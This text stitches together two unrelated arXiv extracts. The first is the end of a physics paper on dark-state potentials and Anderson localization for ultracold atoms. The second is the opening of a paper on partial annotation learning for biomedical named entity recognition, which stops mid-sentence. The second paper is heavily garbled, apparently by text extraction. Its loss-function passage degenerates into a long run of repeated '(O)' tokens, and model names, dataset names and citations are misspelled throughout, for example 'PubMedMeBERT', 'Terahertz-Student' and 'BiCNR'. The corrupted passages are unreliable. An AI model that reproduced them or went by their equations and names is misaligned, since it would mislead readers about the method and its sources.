for \(V_{D}\) and \(V_{\delta,D}\) nearly match. This is because the dark state potential consists now of well-defined narrow peaks, which are well approximated by discrete Dirac-delta peaks of \(V_{\delta,D}\). The difference shows up for only very high momenta, beginning from \(k\sigma_{R}\approx 3.5\). For both shallow and deeper disorder potential, one can reach the conclusion that the Dirac delta \(V_{\delta,D}\) potential is a valid approximation for the low-energy part of the spectrum of Hamiltonian of a particle moving in the dark state potential \(V_{D}\) (only qualitative for a shallow disorder). This is in contrast to the localization in a speckle field which cannot be described by a Kronig-Penney-like model. ## V Tight-binding description of movement in random comb potential In this Section we discuss localization in the dark state potential \(V_{D}\) for the configuration presented in Section III.2 for \(\Omega_{1}(x)=\tilde{\Omega}_{1}\sin(k_{1}x)\), \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)+\tilde{\Omega}_{2}^{0}\), when the potential consists narrow peaks separated by \(a=\pi/k_{1}\). The low energy dynamics in such a potential is captured by a Dirac-delta approximation \(V_{D,\delta}\), Eq. (39) with \(V_{n}\) given by (40) and \(x_{n}=na\). Localization in such a lattice has been previously intensively studied [38]. Following that review, we consider the Schrodinger equation in the following form: \[\left[-\frac{\hbar^{2}}{2m}\frac{d^{2}}{dx^{2}}+\sum_{n=-\infty}^ {\infty}E_{r}(\bar{V}+\delta V_{n})\delta(k_{1}x-k_{1}x_{n})\right]\psi(x)=\\ =\frac{\hbar^{2}q^{2}}{2m}\psi(x), \tag{42}\] where \(\bar{V}+\delta V_{n}=V_{n}\), \(\langle\delta V_{n}\rangle_{n\in\mathbb{Z}}=0\), \(\sigma^{2}=\langle(\delta V_{n})^{2}\rangle_{n\in\mathbb{Z}}\ll\bar{V}^{2}\). Under above assumptions the inverse localization length, \(L_{\text{loc}}\) is: \[\frac{a}{L_{\text{loc}}}=\frac{1}{8}\frac{k_{1}^{2}\sin qa}{q^{2}\sin^{2}ka} \sum_{l=-\infty}^{\infty}\langle\delta V_{n}\delta V_{n+l}\rangle_{n\in \mathbb{Z}}\cos(2kal). \tag{43}\] The wavevector \(k\) is obtained from \[\cos(ka)=\cos(qa)+\frac{\bar{V}k_{1}}{2E_{r}q}\sin(qa). \tag{44}\] for those \(q\) that correspond to the band in case of \(\delta V_{n}=0\). The equation (43) is valid only for those \(q\)'s and it cannot be applied in the forbidden bands. There, in presence of disorder, the density of states is exponentially suppressed [39; 40; 41], but it is non-zero. The localization for those energies can be addressed numerically. Additionally, the analytic expression is not expected to hold near the bottom and the top of the band. Another limitation follows from the details of derivation of Eq. (43) (see [38]): the latter does not yield an anomaly in the localization length at the band centre. It predicts a smooth dependence of \(L_{\text{loc}}\). _Random uncorrelated disorder.-_ We first consider (42) with random, uncorrelated \(\delta V_{n}\). The exact values \(V_{n}=\frac{\pi}{2c}\) are based on random value of \(\epsilon\) with uniform distribution in \([0.124,0.126]\) (weak disorder case) and in Figure 8: The inverse localization length in Kronig-Penney-like potentials with compositional disorder. Panel (a) random Dirac delta peaks, thick lines: \(\epsilon_{+}=0.15,\epsilon_{-}=0.1\), thin lines: \(\epsilon_{+}=0.126,\epsilon_{-}=0.124\); solid black lines: numerical calculation of \(\sigma_{R}/L_{\text{loc}}\) for sample length \(L=16\cdot 10^{6}/k_{1}\); red dashed lines show analytical, Eq. (43). The gray areas denote \(q\)’s not in applicability interval of this equation. Panel (b) green line: \(\sigma_{R}/L_{\text{loc}}\) for \(\epsilon_{+}=0.15,\epsilon_{-}=0.1\) for \(V_{\delta,D}\), \(\delta=0.0005\). Black: random uncorrelated Dirac delta scatterers \(\epsilon_{+}=0.1444\), \(\epsilon_{-}=0.1087\), red: localization length in the dark state potential \(V_{D}\) for \(\Omega_{1}(x)=\tilde{\Omega}_{1}\sin(k_{1}x),\Omega_{2}(x)=\tilde{\Omega}_{2} S_{2}(x)+\tilde{\Omega}_{2}^{0}\), \(\epsilon_{+}=0.15,\epsilon_{-}=0.1\), green: \(V_{D,\delta}\) approximation of \(V_{D}(x)\) given by the red curves. The \(k_{1}\) is set such that \(k_{1}\sigma_{R}=1\) and \(R/f=1/3\). \([0.1,0.15]\) (strong disorder case). The mean potential heights are \(\bar{V}=12.56\) and \(12.73\) respectively. The intervals of applicability of Eq. (43) are \(q/k_{1}\in[0.9096,1]\) and \(q/k_{1}\in[0.9085,1]\). There (44) can be solved for Bloch momentum. In Figure 8a) we compare the localization length given by Eq. (43) to the numerically determined \(L_{\text{loc}}\) as the function of \(q/k_{1}\) for \(q\) within the regions of validity marked with vertical gray dashed lines [42]. We find the quantitatively good agreement between the localization length obtained from Eq. (43) (red lines) and from numerics (black lines). This is true for both weak disorder (thin lines) and strong disorder cases (thick lines). The discrepancies appear near band edges where the analytical expression for the inverse correlation length diverges or equals to zero The singularity present in the dependence of \(L_{\text{loc}}\) on \(q/k_{1}\) determined numerically [see inset in Fig. 8a)] is absent in the analytic expression, Eq. (43). Dark state potential-We now consider the full dark state potential for \(\Omega_{1}(x)=\tilde{\Omega}_{1}\sin(k_{1}x)\), \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)+\tilde{\Omega}_{2}^{0}\). For comparison, we again consider Hamiltonian Eq. (43) with \(\delta V_{n}\) based on \(V_{\delta,D}\) approximation, Eq. (41) and (40). For the parameters considered in this section the potential \(V_{D}\) consists of isolated, well-defined peaks. This allows us to use \(\delta=0.0005\), much smaller than \(\delta=0.25\) used in Section IV.3. We focus on the strong disorder case where for the dark state potential \(\epsilon_{+}=0.15\) and \(\epsilon_{-}=0.1\). The majority of peaks of the dark state potential is between \(44.4E_{r}\) and \(100E_{r}\). When the integral (40) is calculated, this gives the \(V_{\delta,D}\) consisting of Dirac deltas with \(\bar{V}=12.51\). We can also find parameters of the Hamiltonian with uncorrelated \(\delta V_{n}\)'s that will have the same \(\bar{V}\), the amplitude of the disorder is matched by requiring that the standard deviation of \(\delta V_{n}\)'s is the same. Fulfilling those two requirements results in parameters \(\epsilon_{+}=0.1444\) and \(\epsilon_{-}=0.1087\) for the random \(\delta V_{n}\) case. We now compare the localization length determined numerically for the dark state potential \(V_{D}(x)\) and for the \(V_{\delta,D}\) Dirac-delta approximation. In Fig. 8b) we show \(a/L_{\text{loc}}\) as the function of \(q/k_{1}\) (respectively red and green lines). In both cases the inverse localization length shows a dip for the values of \(\hbar^{2}q^{2}/2m\) that can be traced back to the conduction band in the case of no disorder. The visible difference in the location of this region in \(q/k_{1}\) is due to a finite width of potential peaks. One also can observe that the singularity near the band centre is very pronounced. It is much larger than in the random uncorrelated disorder case (see black curve in Fig. 8b)). This occurs for both \(V_{D}(x)\) potential and its Dirac-delta approximation \(V_{\delta,D}(x)\). This is in contrast to the model with random and uncorrelated \(\delta V_{n}\)'s with \(\bar{V}_{n}\) and the standard deviation of \(V_{n}\) matching that of \(V_{\delta,D}(x)\). We find that correlations between \(V_{n}\)'s in \(V_{\delta,D}\) and in the \(V_{D}(x)\) potential enhance the amplitude of the band centre anomaly. This is a known possible effect of disorder correlation [43; 38]. Moreover for the actual dark state potential \(V_{D}(x)\) the localization length \(L_{\text{loc}}\) does not monotonically increase with \(q/k_{1}\). The maximal \(L_{\text{loc}}\) is reached near the anomaly band center, not at the top of the band like in \(V_{\delta,D}(x)\). ## VI Conclusions and Outlooks We have shown the construction of the potential for ultracold atoms using a three-level atomic system. The potential applies to the ultracold atoms populating the dark state. The potentials consist of narrow pseudo-random peaks, with randomness driven by the speckle laser field. We have contrasted the properties of the dark state potential against the off-resonant optical lattice potential given by the speckle field. We have found substantially enhanced localization in the dark state potential, especially for high kinetic energy of the particle. This is explained by a slow decay of the two-point correlation function in the Fourier space, a manifestation of the non-linearity of the dark state potential. This is rooted in different mechanism of generation of the dark state potential than that of the speckle potential which is due to far off-resonant AC-Stark process. Our findings indicate that the potential generation via a dark state of a three level system enhances the resolution of the speckle potential and preserves its randomness properties. This can be further extended by replacing speckle fields generating Rabi frequency \(\Omega_{1}\) with a laser standing wave. It leads to a completely different class of potentials that consist of tall, pseudorandom potential peaks implementing e.g a Kronig-Penney model structural disorder akin to [2; 44]. ###### Acknowledgements. M.L. and J.Z. acknowledge support from National Science Centre (Poland) through grants No. 2019/35/B/ST2/00838 and 2019/35/B/ST2/00034, respectively. The research has been supported by a grant from the Priority Research Area (DigiWorld) under the Strategic Programme Excellence Initiative at Jagiellonian University. No part of this work was written by the artificial intelligence.
2305.13120
Partial Annotation Learning for Biomedical Entity Recognition
Motivation: Named Entity Recognition (NER) is a key task to support biomedical research. In Biomedical Named Entity Recognition (BioNER), obtaining high-quality expert annotated data is laborious and expensive, leading to the development of automatic approaches such as distant supervision. However, manually and automatically generated data often suffer from the unlabeled entity problem, whereby many entity annotations are missing, degrading the performance of full annotation NER models. Results: To address this problem, we systematically study the effectiveness of partial annotation learning methods for biomedical entity recognition over different simulated scenarios of missing entity annotations. Furthermore, we propose a TS-PubMedBERT-Partial-CRF partial annotation learning model. We harmonize 15 biomedical NER corpora encompassing five entity types to serve as a gold standard and compare against two commonly used partial annotation learning models, BiLSTM-Partial-CRF and EER-PubMedBERT, and the state-of-the-art full annotation learning BioNER model PubMedBERT tagger. Results show that partial annotation learning-based methods can effectively learn from biomedical corpora with missing entity annotations. Our proposed model outperforms alternatives and, specifically, the PubMedBERT tagger by 38% in F1-score under high missing entity rates. The recall of entity mentions in our model is also competitive with the upper bound on the fully annotated dataset.
Liangping Ding, Giovanni Colavizza, Zhixiong Zhang
2023-05-22T15:18:38Z
http://arxiv.org/abs/2305.13120v1
# Partial Annotation Learning for Biomedical Entity Recognition ###### Abstract **Motivation:** Named Entity Recognition (NER) is a key task to support biomedical research. In Biomedical Named Entity Recognition (BioNER), obtaining high-quality expert annotated data is laborious and expensive, leading to the development of automatic approaches such as distant supervision. However, manually and automatically generated data often suffer from the _unlabeled entity problem_, whereby many entity annotations are missing, degrading the performance of full annotation NER models. **Results:** To address this problem, we systematically study the effectiveness of partial annotation learning methods for biomedical entity recognition over different simulated scenarios of missing entity annotations. Furthermore, we propose a TS-PubMedBERT-Partial-CRF partial annotation learning model. We harmonize \(15\) biomedical NER corpora encompassing five entity types to serve as a gold standard and compare against two commonly used partial annotation learning models, BiLSTM-Partial-CRF and EER-PubMedBERT, and the state-of-the-art full annotation learning BioNER model PubMedBERT tagger. Results show that partial annotation learning-based methods can effectively learn from biomedical corpora with missing entity annotations. Our proposed model outperforms alternatives and, specifically, the PubMedBERT tagger by 38% in F1-score under high missing entity rates. The recall of entity mentions in our model is also competitive with the upper bound on the fully annotated dataset. **Availability:**[https://ijtee.com/liangping/Ding/partial-annotation-learning](https://ijtee.com/liangping/Ding/partial-annotation-learning) **Contact:** [email protected]; [email protected] **Supplementary information:** Supplementary data are available at _Bioinformatics_ online. ## 1 Introduction Biomedical Named Entity Recognition (BioNER) is a specific sub-task of Named Entity Recognition (NER) that aims to recognize and classify named entities in the biomedical domain. The purpose of BioNER is to annotate the process of extracting information from vast amounts of biomedical texts, which plays a crucial role in both relation extraction (Colot _et al._, 2005) and knowledge base completion (Saklarczyk _et al._, 2016). By accurately identifying and classifying named entities such as genes, diseases, and drugs, BioNER allows for the discovery of new biological relationships between biomedical entities, supporting advances in the field of biomedicine. For fully annotated NER datasets, this problem has been basically solved by fine-tuning pre-trained language models (Devlin _et al._, 2018; Liu _et al._, 2019). While in the biomedical domain, due to privacy and ethical concerns (Zhang and Chen, 2022), the lack of fully annotated datasets is still a common issue for BioNER. This limits the size and diversity of available data, since obtaining high-quality annotations at scale is expensive and labor-intensive. To reduce the reliance on expert annotations, distant supervision (Liang _et al._, 2020) and exploratory expert (Effland and Collins, 2021) approaches have been proposed, leading to partially annotated datasets with high precision but low recall for entity spans, Specifically, datasets suffer from the unlabeled entity problem (Li _et al._, 2021), where large amounts of entity annotations are missing, as exemplified by the entity "SARS-CoV-2" in Fig. 1. Directly assuming missing labels to the non-entities (Qing) may degrade the performance of NER models. The unlabelled entity problem in NER has garnered attention and prior work can be mainly divided into two main directions. The first direction aims to design model architectures to alleviate the effects of false negatives in the training dataset, which is generated by labeling all missing labels as non-entities (Liang et al., 2020). This is accomplished through a model architecture that identifies false negatives and reduces their impact on model performance. The second direction involves using Partial Annotation Learning (PAL), which considers the incompletely labeled data sets as partially annotated data set directly models missing labels (Jie et al., 2019; Mayhew et al., 2019). In this approach, missing labels are treated as latent variables, which is as for the Partial Conditional Random Field (Partial CRF) model (Helter and McCallum, 2007). All possible label paths are then deduced, and the marginal probabilities are calculated at the missing position, with the parameter estimation methods such as the Expectation Maximization algorithm as in Tsukcu _et al._ (2008), utilized to maximize the log-likelihood and estimate model parameters. Partial Annotation Learning-based methods have been shown to alleviate the unlabelled entity problem effectively in previous studies. With only 1,000 biased and incomplete annotations (less than 10% of the original annotations for the datasets), a partial annotation learning model still achieves an F1 score of 71.7% on average (Efimand and Collins, 2021). While most studies have focused on evaluating the effectiveness of partial annotation learning on traditional NER benchmark datasets such as CNLL2003 (Tong Kim Sang and De Meulder, 2005), dealing with the most common named entity types like person, location, and organization. The effectiveness of partial annotation learning methods on the three challenging BiCNR benchmark datasets has not been assessed. Furthermore, to the best of our knowledge, no single study exists which comprehensively evaluates the validity of partial annotation learning and constructs an in-depth assessment of the impact of missing entity ratio and annotation scenario on the model performance. Although Efimand and Collins (2021) compared the traditional NER models to the partial annotation learning models under several annotation budgets, they are the number of entity annotations M \(\leq\) 100 (0.4%), 500 (2.1%), 1K (4.3%), SK (21.3%), IOK (42.6%), making it hard to appreciate the performance under degrading conditions systematically. As we mentioned before, partial annotation learning is a promising approach that allows for the utilization of all possible label paths to train a model. Nevertheless, when a dataset contains abundant missing labels, this can lead to computational costs. To this end, we propose a partial annotation learning-based model architecture for BiCNR called TS-PathoBERT-Fural-CRF, which leverages the advantage of partial annotation learning and uses confidence estimation to iteratively decrease the number of latent variables for parameter estimation in the Partial CRF model. The backbone model architecture is the Partial CRF model built on top of the biomedical pre-trained model PubMedBERT (Gu et al., 2021), which is integrated into a Teacher-Student self-training framework (Liang et al., 2020) with a confidence estimation module to improve model's tolerance to noise. Extensive experiments are conducted to evaluate the efficacy of our proposed model and verify the effectiveness of partial annotation learning models to alleviate the unlabeled entity problem for biomedical NER under various settings. Our proposed model is compared with the state-of-the-art Biomedical NER target PubMedBERT (Gu et al., 2021), as well as two partial annotation learning models, BiLSTM-Fural-CRF (Jie et al., 2019), and EER-PubMedBERT (Efimand and Collins, 2021) across 5 biomedical entity types. Our experimental results confirm that even a state-of-the-art full annotation learning model still suffers from the unlabelled entity problem when the number of missing entity annotations increases. Instead, partial annotation learning based methods can effectively capture missing entity annotations in the dataset, achieving promising results even with 90% of entity annotations missing. Further, our model performs as well as the state-of-the-art partial annotation learning model from Efimand and Collins (2021) across the unified missing entity ratio and the annotation scenario, and performs better under higher missing rates and a more realistic annotation scenario. ## 2 Related Work Named Entity Recognition (NER) task is typically defined as a sequence labeling task in which tokens in a sequence are annotated using a tagging scheme such as BIO (Bamshav and Marcus, 1995) or BiBU (Gauinov and Roth, 2009). A conditional Random Field (CRF) model, which captures dependencies between labels, is frequently used as an NER trigger. However, traditional CRF models have limitations in directly modeling missing labels. Bellare and McCallum (2007) extended the conventional CRF and introduced the MC-CRF model to directly learn from incomplete annotations, which is the first application of the partial annotation learning method to the sequence labeling task. To deal with missing labels in an automatic metadata extraction task, they proposed a novel training objective for a CRF model that treated missing labels as latent variables, allowing for partial annotation learning by calculating marginal probabilities over all possible label paths. The Expectation Maximization algorithm (Dempter et al., 1977) was then utilized to maximize the log-likelihood, and the model parameters were estimated accordingly. Partial annotation learning has been applied to many NLP tasks, including part-of-speech tagging (Tsub et al., 2008), word segmentation (Yang and Vozila, 2014), lexical disambiguation (Hovy and Hovy, 2012), to tackle the problem of incomplete annotation in the annotated corpus. In NER, partial annotation learning has been shown to significantly improve the performance of distantly supervised NER models, when compared to simply labeling all missing labels as non-entities to train supervised NER model, or to using dictionaries in match entities (Gu et al., 2019; Carlson et al., 2009; Yang et al., 2018). While the effectiveness of partial annotation learning models were mainly evaluated on common entity types, few works applied partial annotation learning methods on domain-specific NER tasks. Jie et al. (2019) introduced a method to train a BiLSTM-Fural-CRF model with incomplete annotations, assigning high probability masks to the most probable labeling sequence that matches the available partial annotations. They dropped 50% of the entry annotations in the CoML 2003 English dataset (Tjong Kim Sang and De Meulder, 2003) and the CoML 2002 Spanish NER dataset (Tjong Kim Sang, 2002) to simulate the incomplete annotation scenario and evaluate models' performance. Even though Greenberg et al. (2018) constructed a partial annotation learning model for BiCNR, and achieved promising performance with incomplete annotations compared to the traditional CRF model, they used the BiLSTM-Fural-CRF model architecture, which seems to be outdated for today's standards as models based on the Transformer architecture (Vaswani et al., 2017), specifically the pre-trained BERT model.(Devlin et al., 2018). Figure 1: Example illustrating the unlabelled entity problem in NER. The “Sequence” row shows the token sequence of the input text, and the “Goal” row reflects the golden truth label path under the BiBU encoding scheme, and the “Partial” row shows the partially annotated label path, in which the graph\(\backslash\) — represents the unknown label. ## 3 Materials and methods In this section, we provide a technical explanation of the TS-PubMedMeBERT-Partial-CRF approach and discuss the competitor systems to compare against. Additionally, we outline the details on how to construct synthetic partially annotated datasets from the golden standard corpora using various entity annotation removal algorithms. ### Task Formulation In this work, we formulate the BioNER task as a sequence labeling task, where given a sequence of tokens \(\mathbf{X}=[x_{1},...,x_{n},...,x_{n}]\), the goal is to predict a corresponding label sequence \(\mathbf{Y}=[y_{1},...,y_{n},...,y_{n}]\), \(s.\)\(y_{i}\in\mathcal{Y}\) that encodes the named entities, where \(\mathcal{Y}\) represents the label set and \(n\) is the length of the sequence. The third annotated NER dataset with \(K\) samples can be regarded as a set of pairs of token sequence and label sequence: \[\mathbf{D}=\left\{\left(\mathbf{X}^{(k)},\mathbf{Y}^{(k)}\right)\right\}_{k=1}^{K} \tag{1}\] where \((\mathbf{X}^{(k)},\mathbf{Y}^{(k)})\) is the \(k\)-th instance from dataset \(\mathbf{D}\). For partially annotated dataset suffering from the unlabeled entity problem, the label sequence is incomplete with unknown labels. Instead of converting all missing labels in the partially annotated dataset to non-entity labels (Jie _et al._, 2019; Miyaw _et al._, 2019), we mark them as potential entities with a special "unknown" type. Given a token sequence \(\mathbf{X}\), the partial label sequence is a set of observed (label, position) pairs, defined as \(\mathbf{Y}_{\mathbf{\rho}}\subset\left(\{y_{1},y_{1}\}\right)\) \(\mathbf{\mu}\in\mathcal{Y},1\leq i\leq n\right)\) and we can define a collection of all possible completed sequences for \(\mathbf{X}\) that are compatible with \(\mathbf{Y}_{\mathbf{\rho}}\)-denoted as \(\mathbf{C}(\mathbf{Y}_{\mathbf{\rho}})\). For example, in Fig. 1, there is only one observed label at position \(1\), so the partial label sequence is \(\mathbf{Y}_{\mathbf{\rho}}=\left(\{\text{U}-\text{ Disease},1\}\right)\). For the \(6\) missing label positions, we can derive a possible label sequence collection \(\mathbf{C}(\mathbf{Y}_{\mathbf{\rho}})\), whose size is \(|\mathcal{Y}|^{6}\). Under this formulation, a partially annotated dataset will be given as: \[\mathbf{D}_{\mathbf{\rho}}=\left\{\left(\mathbf{X}^{(k)},\mathbf{Y}_{\mathbf{\rho}}^{(k)}\right) \right\}_{k=1}^{K} \tag{2}\] ### TS-PubMedBERT-Partial-CRF model architecture TS-PubMedMeBERT-Partial-CRF model combines insights from the BOND-Coca model (Ding _et al._, 2022) and the EER-BERT model (Efland and Collins, 2013), by combining a Teacher-Student self-training framework with partial annotation learning to alleviate competition costs. The backbone architecture of the TS-PubMedMeBERT-Partial-CRF model is **P**ubMeBERT-Partial-CRF, where the pre-trained language model produces PubMedMeBERT plays the role of the encoder to generate the contextual language representation and the partial CRF model takes care of the sequential label sequences and models missing labels as latent variables. The PubMedMeBERT-Partial-CRF model is then integrated into a Teacher-Student self-training framework with the Coca strategy (Category-Oriented Confidence Calibration)(Ding _et al._, 2022) as a confidence estimation method to update the dataset with high-confidence labels, forming the architecture of the TS-PubMedMeBERT-Partial-CRF model. As illustrated in Fig. 2, training a TS-PubMedMeBERT-Partial-CRF model can be regarded as a two-step process, that is initialization and teacher-Student self-training. In the first step, no mitigate the effect of the unlabeled entity problem, we take full advantage of partial annotation learning to model the distribution of entity annotations based on all Figure 2: TS-PubMedMeBERT-Partial-CRF Model Architecture the possible label paths, avoiding being manipulated by wrong signals of false negatives. And before self-training, we use the Coc strategy to automatically calculate class-wise confidence thresholds, taking into consideration different confidence scales among label types. In the second step, we reduce the number of possible label paths in the partial CRF, we integrate the PubMedREF-Partial-CRF model into the Terahertz-Student self-training network to iteratively estimate confidence scores and re-annotate data at each iteration. Specifically, for each given token sequence \(\boldsymbol{X}^{(k)}\), the partial CRF model will output a confidence score \(s^{(k)}\) for each predicted label sequence \(\boldsymbol{Y}^{(k)}\) and choose the label sequence with the highest confidence score as the final label sequence. To get the confidence score at each token position, we use the dynamic programming forward-backward algorithm, also known as Baum-Weikel algorithm (Baum _et al._, 1972) to calculate the marginal distribution and derive the token-level confidence score. Formally, for each given token sequence \(\boldsymbol{X}^{(k)}\), we use PubMedREF to encode the sequence and get the hidden state of the last layer at each token position as the contextual language representation: \[h_{1:n}=\mathrm{BERT}\left(\boldsymbol{X}^{(k)};\theta_{\mathrm{BERT}}\right) \tag{3}\] Atop the contextual representation for each token, we use a linear layer to get the independent confidence score at each token position for each label, which is known as the emission score, noting that this score doesn't consider the global sequence consecutively. \[\phi\left(i,y_{i}\right)=\mathrm{Linear}\left(h_{i}\right) \tag{4}\] We summarize the emission score and the transition score to get the log potentials, which can be then used to model the conditional probability of the CRF model. \[\phi\left(i,y_{i},y_{i+1}\right)=\phi\left(i,y_{i}\right)+T_{y_{i},y_{i+1}} \tag{5}\] \[p(\boldsymbol{Y}^{(k)}|\boldsymbol{X}^{(k)};\theta) =\frac{\phi(\boldsymbol{Y}^{(k)})}{Z} \tag{6}\] \[=\frac{\exp\{\sum_{i=1}^{n-1}\phi\left(i,y_{i},y_{i+1}\right)+ \phi\left(n,y_{i}\right)\}}{Z}\] \[\alpha,Z=\mathrm{Forward}\left(\phi\right)\] (7) \[\beta,Z=\mathrm{Backward}\left(\phi\right) \tag{8}\] where \(Z\) denotes the partition function, \(\mathrm{Forward}(\cdot)\) and \(\mathrm{Backward}(\cdot)\) denote the forward and backward algorithms separately, \(\alpha\) and \(\beta\) denote the variables of the forward and backward algorithms respectively. Finally, we can get the confidence score for the label prediction at each token position by calculating the marginal probabilities. \[\kappa_{i}=p(\phi_{i}|\boldsymbol{X}^{(k)})=\frac{\alpha_{i}\beta_{i}}{Z} \tag{9}\] where \(\kappa_{i}\) denote the confidence score for the model to predict \(i\), at the \(i\)-th position, \(\alpha_{i}\) and \(\beta_{i}\) denotes the forward and backward probability at the \(i\)-th position correspondingly, noting that \(\kappa_{i}\) considers both dependency between consecutive labels. Commonly, neural-backward models are trained in a supervised learning paradigm using a batch-wise learning to compute the gradients of the loss function with respect to each parameter of the model. In the training process, we maximize the marginal likelihood of the observed tags (Tuboi _et al._, 2005), and approximate the parameters with Monte-Carlo estimates from mini-batches (Robbins and Monro, 1951), see Equation (10). In each batch, the algorithm computes the gradients for a subset of the training data, rather than the entire dataset, in order to reduce the computational cost of the optimization. By iteratively updating the parameters in this way, the algorithm aims to find the optimal set of parameters that minimize the loss function and enable the model to make accurate predictions. \[L_{\mathrm{PAL}}\left(\theta;\boldsymbol{D}_{\boldsymbol{p}}\right)=-\sum_{k} \log\sum_{y\in\mathcal{C}\left(\boldsymbol{Y}^{(k)};\theta\right)}p\left(y\middle| \boldsymbol{X}^{(k)};\theta\right) \tag{10}\] In addition, the expected entity ratio is shown to be a piece of crucial prior knowledge for guiding the model to simulate the real distribution from incomplete annotations. Effland and Collins (2021) assumed that the number of named entity tags (events Drug) over the entire distribution of sentences occur at relatively stable rates for different named entity datasets with the same task specification. So they proposed using the Expected Entity Ratio (EER) loss in conjunction with the Partial Annotation Learning (PAL) loss to conduct multi-task learning. Specifically, if there are \(N\) entity annotations in total for the partially annotated dataset, the entity ratio under complete annotation is expected to be \(\mu\). During neural network training, their practice is to sample \(B\) instances from the \(N\) population and to encourage the tag marginals of being part of an entity when \(\{p\neq(j\}\)) in each sampled batch under the model to match the given EER, up to a margin of uncertainty \(\gamma\). While the entity distribution in NER datasets is highly skewed, with a large proportion of \(\gamma\)-D labels denoting non-entities, the overall entity distribution across the entire dataset may differ from that of individual batches. We speculate that solely relying on the entity ratio within a batch may lead to high variance and thus, limited generalisation performance. As a result, we propose the Overall Expected Entity Ratio (OER) loss to tackle this problem by exploiting an additional constraint to the EER loss to encourage the \(p\neq(j\prime\prime\prime)\)\(O)\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(OO\)\(O\)\(O\)\(O\)\(OO\)\(O\)\(O\)\(O\)\(OO\)\(O\)\(O\)\(O\)\(OO\)\(O\)\(O\)\(O\)\(O\)\(O\)\(OO\)\(O\)\(O\)\(O\)\(O\)\(OO\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\)\(O\) The final loss, presented in Equation (13), combines Equation (10), Equation (11), and Equation (12), noting that the \(L_{\rm ST}\) is zero before self-training. ### 3.3 Competitor systems In this study, we compare the TS-PubMedHERET-Partial-CRF model to two types of competitors to explore the effectiveness of our proposed model for the BioBERT task: fully annotated learning-based systems, and partial annotating template-based KBF systems. For the full annotation learning-based system, we experiment with PubMedHERET (Abstract-Fullnet) (Gu et al., 2011), which is the state-of-the-art pre-trained language model in the biomedical domain. PubMedHERET was pre-trained from scratch using the abstracts and full-text articles from PubMed Central, which has been shown to outperform BERT (Devlin et al., 2013), RohBERT (Liu et al., 2019), BioBERT (Lee et al., 2019), SciBERT (Belbey et al., 2019) etc. on NBR task based on medical language. The PubMedHERET NER tapes were then final hidden representation of PubMedHERET for each token and inputs into a classification layer to categorize the tokens into different NER labels. For partial annotation learning-based systems, we implement two models from prior work. One of them is the B1ST-Partial-CRF model, proposed by Ji et al. (2019), which is a commonly used baseline model for partial annotation learning. This model is based on a BiLSTM-Partial-CRF followed by a self-training framework with cross-validation. This architecture combines a recurrent neural network with a Long Short-Term Memory (LSTM) (Hochreiter and Schmidhuber, 1997), for learning correlations of features or the input text and a partial CRF for predicting the the sequence. The loss function during training will be marginalized over the labels in the missing position to consider all potential labels. The trained model is used to update global labeling distributions in the final fold by processing all but one fold that this process will 